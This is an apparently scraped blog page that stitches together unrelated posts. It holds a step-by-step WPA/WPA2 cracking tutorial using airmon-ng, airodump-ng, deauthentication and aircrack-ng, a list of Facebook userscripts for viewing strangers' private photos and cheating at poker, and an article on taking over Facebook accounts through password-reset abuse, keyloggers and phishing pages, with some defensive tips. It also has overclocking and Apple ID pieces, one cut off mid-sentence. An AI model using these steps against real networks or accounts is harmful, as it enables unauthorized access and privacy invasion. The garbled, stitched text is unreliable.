Saturday, 19 July 2014

Hacking Wifi WPA2 Backtrack 5R3

Assalam-o-Alikum to all of you!
This lecture is about wpa\wpa2 cracking.
Requirements for WPA\wpa2 cracking:
1= Backtrack 5r3
2= WiFi device 
3= world-list file 

The commands which we will need in wpa\wpa2 cracking are as under:

1= Airmon-ng
2= Airmon-ng start wlan0
3= Airodump-ng mon0
4= Airodump-ng -c ( channel ) -w ( file name to rite captured packets ) --bssid (bssid of network) mon0
5= Aireplay-ng --deauth 1 -a (bssid) mon0
6= Aircrack-ng (file name) -w( drag worldlist file )

Process . . . .

1= * Open terminal and type first command:
Airmon-ng :
This command will shows the interfaces status. You need to change the status from managed mode to monitor mode. (As shown)
[Image: 1st_command.png]

2= * Now type second command :
Airmon-ng start wlan0 :
This command enables monitor mode on the wireless interface. (As shown)
[Image: 2nd_command.png]

3= * Now type third command:
Airodump-ng mon0 :
This command will scane all networks. (AS shown)
[Image: 3rd_command.png]

4=* Now type foruth command:
Airodump-ng -c ( channel ) -w ( file name to save captured packets ) --bssid (bssid of network) mon0 :
This cammand will scane a single network and you must have to wate untill you get handshake file .For our example, it would look like:
airodump-ng –w capture-packages –bssid 00:22:75:E7:6E:0B –c 11 mon0 (As Shown)
[Image: 4th_command.png]

5= * Now type fifth command :
Aireplay-ng --deauth 64 -a (bssid) mon0 :
This command will send deauth request if the data is not generating you can also increse the number of deauth requests.for our example, it would look like:
aireplay-ng --deauth 1 –a 00:22:75:E7:6E:0B –c F0:CB:A1:2A:FB:62 mon0. (As shown)
[Image: 5th_command.png]

6= * Now type sixth command : NOTE: World-list should be in "/ROOT/PEN TEST/PASSWORDS/WORLD-LIST/"
Aircrack-ng (file name) -w( drag world-list file ) :
This command will crack the password. (As Shown) :lol: 
[Image: 6th_command.png] 

Hope all of you get it. If any problem ask me ( Must Reply ) & if there is any mistake you can tell me I'll correct it.

Know What Overclocking / Overclocking

Overclock might be a foreign language to a beginner in the field of hardware. But for those who have advanced the field of hardware, the word is a word used raw and in their daily lives. Overclock composed of two words is over and the clock, which means setup mainboard and a processor clock for VGA. Overclock can be interpreted to make the computer more quickly.
Not known since when overclocked started. Estimated overclock already started in 1985. The first computer that sold the type of PC XT with Intel processor type (8088) and made quicker work of the NEC V20 processor. Overclock starting to bloom when the Pentium processor and 486 DX Classic first. But when its overclocked processor can only be done with a jumper on the mainboard. For example, Pentium 166Mhz using jumper for reached 200MHz speed, there is little difference between 166 MHz and 200MHz, But good enough to pace that year.
The main objective is the spurring overclock a processor VGA and CPU for faster work. Currently easier to overclock with existing technology, because of the availability of the enhancements, and supported by the mainboard companies to enter the BIOS overclock system. Allow everyone makes computer with overclock.
There are also special purposes a trend after 2000, for gaming applications. Use overclocking / overclocking can cause a dramatic increase in your computer, depending on what you do overclocking. To perform overclocking you simply change the default BIOS settings, and for advanced overclocking you need to have a deeper knowledge. The more you do extremes overclocking the higher the risk, because overclocking maximize your hardware, it causes excessive heat, make sure the air system and the computer is a very good place to place your computer in a room that has air conditioning. If it is not the motherboard, processor, computer, VGA card may be burned, even though the computer has had the system automatically turns off in case of overheating. You need to remember the hardware warranty does not cover damages caused by overclocking!!! By doing overclock, a computer will be faster and more convenient to enjoy. With overclock all devices will increase. The last function is the most commonly used objective.

Top 10 Facebook Hacks [Userscript Hacks]

Top 10 Facebook Hacks [Userscript Hacks]

facebook-tricks-by-imthy.com-07NOTE:  This is an old post that has been modified with new links and text, so few userscripts may or may not work according to recent facebook privacy changes :)

Userscripts have taken our entire online experience to a new level, with userscripts we can easily add any kind of JavaScript activity to our online service's like I posted YouTube Center Script that enhances the YouTube experience by providing you various playback options and much more, so today I will be posting 10 great userscript hacks that will allow you to modify your facebook experience.
So using these userscripts I have posted below you will be able to view albums, change your facebook layout and much more so jump in and lets get started.
  1. View Private Albums - well you can easily view private albums of any person if he or she is not your friend too, well just install this userscript [Link] and see links to original image to their albums.
  2. Remove Facebook Advertisements - facebook cleaner is another good userscript that simply allows you to remove that bad sponsored and advertisement area from facebook so to do that just install this userscript[Link] and see them vanished away.
  3. Redirect Real Profile's - normally when searching about any person you come across your public pages, well using this userscript [Link] you can get redirected to real people's profile, well make sure that you are logged in to facebook for avoiding infinite loop's.
  4. Undo Facebook Changes - facebook always come's with something special and unique but everyone does not accept those changes, so if you are one of them then this simple userscript [Link] will allow you to undo an facebook change by choosing at what level you want to undo at, so its really a good hack.
  5. Viewing all Photo's - well sometimes you may try to view every photo related to that person, well you can not do that if that person has some tight privacy settings or something by using this easy userscript [Link]you can do that.
  6. Find More New Friends - sometimes your known friends join facebook but you do not know about that thing, well using this official facebook feature [Link] you can find them by checking your friends list.
  7. Sharing File from Facebook - well are wondering how to share file's from facebook well these 30 apps [Link]will allow you to desktop share anything using Facebook.
  8. Get Job from Facebook - well if you are a facebook addict then this could be the easiest way to get job on facebook as this apps [Link] include easy job opportunities and other stuff for you.
  9. Tighten Privacy on Facebook - well if you consider a good privacy plan for your facebook profile then these privacy checking tool's [Link] will allow you to check your online facebook privacy and will tell you what to tighten up for more optimum level of facebook experience.
  10. Cheat Facebook Texas Poker - well using this simple tool [Link] you can see cards of any player's and hence you could cheat out virtually.

4 Ways to Crack a Facebook Password and How to Protect Yourself from Them

Despite the security concerns that have plagued Facebook for years, most people are sticking around and new members keep on joining. This has led Facebook to break records numbers with over one billion monthly active users as of October 2012—and around 600 million active daily users.
We share our lives on Facebook. We share our birthdays and our anniversaries. We share our vacation plans and locations. We share the births of our sons and the deaths of our fathers. We share our most cherished moments and our most painful thoughts. We divulge every aspect of our lives. We even clamor to see thelatest versions even before they're ready for primetime.
But we sometimes forget who's watching.
We use Facebook as a tool to connect, but there are those people who use that connectivity for malicious purposes. We reveal what others can use against us. They know when we're not home and for how long we're gone. They know the answers to our security questions. People can practically steal our identities—and that's just with the visible information we purposely give away through our public Facebook profile.
The scariest part is that as we get more comfortable with advances in technology, we actually become more susceptible to hacking. As if we haven't already done enough to aid hackers in their quest for our data by sharing publicly, those in the know can get into our emails and Facebook accounts to steal every other part of our lives that we intended to keep away from prying eyes.
In fact, you don't even have to be a professional hacker to get into someone's Facebook account.
It can be as easy as running Firesheep on your computer for a few minutes. In fact, Facebook actually allows people to get into someone else's Facebook account without knowing their password. All you have to do is choose three friends to send a code to. You type in the three codes, and voilà—you're into the account. It's as easy as that.
In this article I'll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone's Facebook account. But don't worry, I'll also show you how to prevent it from happening to you.

Method 1: Reset the Password

The easiest way to "hack" into someone's Facebook is through resetting the password. This could be easier done by people who are friends with the person they're trying to hack.
  • The first step would be to get your friend's Facebook email login. If you don't already know it, try looking on their Facebook page in the Contact Info section.
  • Next, click on Forgotten your password? and type in the victim's email. Their account should come up. Click This is my account.
  • It will ask if you would like to reset the password via the victim's emails. This doesn't help, so press No longer have access to these?
  • It will now ask How can we reach you? Type in an email that you have that also isn't linked to any other Facebook account.
  • It will now ask you a question. If you're close friends with the victim, that's great. If you don't know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.
  • If you don't figure out the question, you can click on Recover your account with help from friends. This allows you to choose between three and five friends.
  • It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.

How to Protect Yourself

  • Use an email address specifically for your Facebook and don't put that email address on your profile.
  • When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simply going through your Facebook. No pet names, no anniversaries—not even third grade teacher's names. It's as easy as looking through a yearbook.
  • Learn about recovering your account from friends. You can select the three friends you want the password sent to. That way you can protect yourself from a friend and other mutual friends ganging up on you to get into your account.

Method 2: Use a Keylogger

Software Keylogger
A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim's computer. It will automatically start capturing keystrokes as soon as the computer is turned on and remain undetected in the background. The software can be programmed to send you a summary of all the keystrokes via email.
CNET has Free Keylogger, which as the title suggests, is free. If this isn't what you're looking for, you can search for other free keyloggers or pay for one.
Hardware Keylogger
These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim's computer. The USB drive will save a summary of the keystrokes, so it's as simple as plugging it to your own computer and extracting the data. You can look through Keelog for prices, but it's bit higher than buying the software since you have the buy the USB drive with the program already on it.

How to Protect Yourself

  • Use a firewall. Keyloggers usually send information through the internet, so a firewall will monitor your computer's online activity and sniff out anything suspicious.
  • Install a password manager. Keyloggers can't steal what you don't type. Password mangers automatically fill out important forms without you having to type anything in.
  • Update your software. Once a company knows of any exploits in their software, they work on an update. Stay behind and you could be susceptible.
  • Change passwords. If you still don't feel protected, you can change your password bi-weekly. It may seem drastic, but it renders any information a hacker stole useless.

Method 3: Phishing

This option is much more difficult than the rest, but it is also the most common method to hack someone's account. The most popular type of phishing involvescreating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.
The easiest way to do this would be to follow our guide on how to clone a website to make an exact copy of the facebook login page. Then you'll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available by Alex Long here on Null Byte. Users are very careful now with logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But, it's still possible, especially if you clone the entire Facebook website.

How to Protect Yourself

  • Don't click on links through email. If an email tells you to login to Facebook through a link, be wary. First check the URL (Here's a great guide on what to look out for). If you're still doubtful, go directly to the main website and login the way you usually do.
  • Phishing isn't only done through email. It can be any link on any website / chat room / text message / etc. Even ads that pop up can be malicious. Don't click on any sketchy looking links that ask for your information.
  • Use anti-virus & web security software, like Norton or McAfee.

How to Delete an Apple ID

If you use Apple products, chances are you've set up an account with Apple. When you do so, you create an Apple ID—the user name that you use for all your Apple transactions, from downloading free apps to purchasing pro-level Apple software. Should you stop using Apple products or create additional Apple IDs, you may wish to delete the obsolete ID. While there's no way to actually delete an Apple ID, there are still things you can do to render an old ID useless. This article will show you how to proceed.[1]
Part 1 of 2: Removing the Apple ID From Your Computer
Delete an Apple ID Step 1.png


1
Delete Apple IDs from iTunes. Remember to do this on each computer your ID is associated with; While you can de-authorize computers individually, it's much easier to do them all at once. First, launch iTunes, and from the "Store" menu, select "View My Apple ID" (followed by your email address.
  • After entering your password, this will open up your Account Information where you can manage your entire iTunes account.
Delete an Apple ID Step 2.png
  1. 2
    Deauthorize all computers. In the Account Information window, click "Deauthorize All" on the lower right hand side of the Account Information window.
  2. Delete an Apple ID Step 3.png
    3
    Confirm the deauthorization. In the confirmation dialog, click "Deauthorize all computers."
  3. Delete an Apple ID Step 4.png
    4
    Shut down iCloud services. If you've associate other devices with your Apple ID, they can download content from that ID. Click on Manage Devices to change those settings.
  4. Delete an Apple ID Step 5.png
    5
    Remove devices. In the Manage Devices window, click "Remove" for every device listed.
  5. Delete an Apple ID Step 6.png
    6
    Disable Auto Renew. If you've set up an iTunes Match subscription with your Apple ID, be sure to turn that off. Click the "Turn Off Auto-Renew" button.
The iTunes Match text will confirm that your subscription will not ren

Part 2 of 2: Remove Apple ID From Your iOS Devices
  1. Delete an Apple ID Step 7.png
    1
    Tap the Settings icon. It's usually found on your Home Screen. Tap it to open the Settings control panel.
  2. Delete an Apple ID Step 8.png
    2
    Scroll down and tap "iTunes & App Stores." This will open up the iTunes & App Stores control panel, where you can configure you iOS device for a new or different Apple ID.
  3. Delete an Apple ID Step 9.png
    3
    Tap the Apple ID button at the top of the screen.
  4. Delete an Apple ID Step 10.png
    4
    Tap Sign Out. The popup panel will let you select from a number of options:
    • View Apple ID: This gives you an overview of your Apple ID account.
    • Sign Out: Logs you out of the Apple ID account on your iOS device.
    • iForgot: Takes you to Apple's "iForgot" web page where you can recover a forgotten password or Apple ID.
    • Tap Sign Out to close your Apple ID on the current device.
  5. Delete an Apple ID Step 11.png
    5
    Sign back in. If you've created an alternate Apple ID, enter it now, or create a new 

EARN FREE BITCOIN